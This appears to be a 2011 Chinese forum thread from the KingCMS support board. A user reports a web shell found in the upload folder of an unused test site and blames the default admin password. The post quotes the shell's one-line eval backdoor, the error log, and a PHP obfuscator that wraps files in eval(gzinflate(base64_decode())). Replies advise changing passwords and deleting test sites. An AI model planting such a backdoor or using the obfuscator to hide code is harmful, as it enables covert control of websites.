K9 通用版 博客版 主题版 地方门户版 企业版 |   企业(ASP) 分类 使用 分享 疑问 模板 建议 帮助 错误 其他
+新建主题 [Ajax]
填写帐号密码即可完成注册
+新建话题 最新回复排序 最新主题排序 精华帖子

KingCMS 企业(PHP) 6.0.813 上传漏洞

1Next >

fox1383164k 发表于:11-10-13 09:47 编辑于:10-13 11:02 [添加收藏] 楼主 [回复] #Top#
fox1383164k 人气:377 积分:864 金币:3006
KC元老 灌水狂人

以前在国外空间上挂了一个kingcms php的测试站,没有添加任何数据,今天猛然发现upfiles目录有一个名字叫201109010456547843.php
路径如下:/upfiles/image/2011/09/01/
站点装载的编辑器有:xheditor  nicEdit
里面的代码
<?php session_start(); eval($_POST["4ngr7"]); eval($_SESSION[s]);?>



在相同目录还有一个error_log
里面的内容:
[01-Sep-2011 05:05:11] PHP Parse error:  syntax error, unexpected T_STRING in /upfiles/image/2011/09/01/201109010456547843.php(1) : eval()'d code on line 2
[01-Sep-2011 05:06:11] PHP Warning:  gzinflate() [<a href='function.gzinflate'>function.gzinflate</a>]: data error in /upfiles/image/2011/09/01/201109010456547843.php(1) : eval()'d code on line 6
[01-Sep-2011 05:18:04] PHP Warning:  gzinflate() [<a href='function.gzinflate'>function.gzinflate</a>]: data error in /upfiles/image/2011/09/01/201109010456547843.php(1) : eval()'d code on line 6
[01-Sep-2011 05:33:18] PHP Parse error:  syntax error, unexpected T_STRING in /upfiles/image/2011/09/01/201109010456547843.php(1) : eval()'d code on line 5
[01-Sep-2011 05:34:44] PHP Parse error:  syntax error, unexpected T_STRING in /upfiles/image/2011/09/01/201109010456547843.php(1) : eval()'d code on line 5


后来仔细回想了一下,发现是因为使用的默认管理员账号密码。在百度用 power by kingcmsphp  这种语句搜索,能找到一大把类似的网站,里面没有任何数据,只是一个空壳,这就给动机不良的人创造了有利条件,能力好的通过这个网站可以提权等等任何操作,危急其他网站。 

同时在根目录发现12.php
里面部分代码如下:
<?php
function encode_file_contents($filename) {
$type=strtolower(substr(strrchr($filename,'.'),1));
if('php'==$type && is_file($filename) && is_writable($filename)){// 如果是PHP文件 并且可写 则进行压缩编码
$contents = file_get_contents($filename);// 判断文件是否已经被编码处理
$pos = strpos($contents,'/*Protected by 草名http://www.crazyi.cnCryptation*/');
if(false === $pos || $pos>100){ // 去除PHP文件注释和空白,减少文件大小
$contents = php_strip_whitespace($filename);
// 去除PHP头部和尾部标识
$headerPos = strpos($contents,'<?php');
$footerPos = strrpos($contents,'?>');
$contents = substr($contents,$headerPos+5,$footerPos-$headerPos);
$encode = base64_encode(gzdeflate($contents));// 开始编码
$encode = '<?php'." /*Protected by 草名http://www.crazyi.cnCryptation*/n eval(gzinflate(base64_decode(".$encode.")));n /*Reverse engineering is illegal and strictly prohibited- (C)草名 Cryptation 2008*/ n?>";
return file_put_contents($filename,$encode);
}
}
return false;
}
//调用函数
$filename='g:我的文档桌面test.php';
encode_file_contents($filename);
?>

这里提醒那些仍然挂着kingcms测试站的,密码没有修改的用户赶紧改动一下,否则会殃及池鱼的。


xin266 发表于:11-10-13 09:58 沙发 [回复] #Top#
xin266 人气:177 积分:1269 金币:2322
KC元老
不改密码很悲剧的
无聊的飞翔 发表于:11-10-13 11:53 板凳 [回复] #Top#
无聊的飞翔 人气:402 积分:1720 金币:20053
KC元老
这个漏洞可以解决吗
fox1383164k 发表于:11-10-13 14:37 4楼 [回复] #Top#
fox1383164k 人气:377 积分:864 金币:3006
KC元老 灌水狂人
Reply: 板凳
可以,把测试站删掉,或者更改管理员密码即可,搭建好了千万不要使用默认的密码。

另外kingcms php使用的人不多,黑客研究的漏洞也不多,只要别让对方顺利登陆你的后台即可。
cwwqsz 发表于:11-10-14 00:42 5楼 [回复] #Top#
cwwqsz 人气:0 积分:68 金币:20
安全性要把握好啊
qinrunyouzhi 发表于:11-10-17 15:31 6楼 [回复] #Top#
qinrunyouzhi 人气:16 积分:598 金币:2017
默认的管理员直接删除了。
zhoufengyu 发表于:11-10-19 23:13 7楼 [回复] #Top#
zhoufengyu 人气:5 积分:51 金币:370
学习了
ehun 发表于:12-11-26 01:17 8楼 [回复] #Top#
ehun 人气:0 积分:21 金币:80
学习了
优惠吧 发表于:12-11-26 06:46 9楼 [回复] #Top#
优惠吧 人气:18 积分:227 金币:766
直接将后台目录更名

1Next >

发表回复

帐号 匿名发布 审核后可见 [加载完整在线编辑器]
内容
验证码
KingCMS 内容管理系统

关于我们 联系我们 广告报价 付款方式 站点导航

Copyright © 2004-2015 Focuznet All rights reserved.

广州唯众网络科技有限公司 粤ICP备08008106号